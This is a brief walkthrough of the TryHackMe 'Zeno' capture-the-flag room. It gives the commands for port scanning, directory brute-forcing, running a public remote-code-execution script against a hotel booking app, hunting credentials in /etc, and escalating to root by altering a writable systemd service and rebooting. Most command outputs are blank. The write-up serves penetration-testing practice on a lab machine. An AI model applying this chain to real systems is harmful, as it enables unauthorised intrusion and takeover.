Step 1: Port overview
Command:
nmap -vv -p- -T5 -Pn 10.10.228.41 -oN open_ports
Get:
Command:
sudo nmap -O -sV -sC -p 22,12340 10.10.228.41 -oN nmap_scan
Get:
Step 2: Check port 12340
Enum http://10.10.228.41:12340
Command:
gobuster dir -u http://10.10.228.41:12340 -w '/wordlists/dirb/big.txt' -x txt,php,html -t 80
Get:
Step 3: Exploit
Google “Pathfinder Hotel exploit”
Get:
Code without syntax errors:
Command:
python2 rms-rce.py http://10.10.228.41:12340/rms/
Get:
Trigger WebShell:
Get Shell:
Step 4 Enum server
Command:
find / -user edward 2>/dev/null
Get:
We have “zeno” in “/var/spool/mail”
Search for “zeno”
Command:
grep -r -i zeno /etc 2>/dev/null -A 2 -B 2
Get:
We have the password for Edward
Step 5: PrivEsc
Command:
sudo -l
Get:
“reboot” alone is not helpful, but in combination with a system file it is
Command:
find /etc -writable 2>/dev/null
Get:
Exploit “/etc/systemd/system/zeno-monitoring.service”
Command:
cat /etc/systemd/system/zeno-monitoring.service
Get:
Manipulate “/etc/systemd/system/zeno-monitoring.service”
Command:
sudo /usr/sbin/reboot
Wait 2–3 minutes
Link to Try Hack Me: https://tryhackme.com
Link to challenge: https://tryhackme.com/r/room/zeno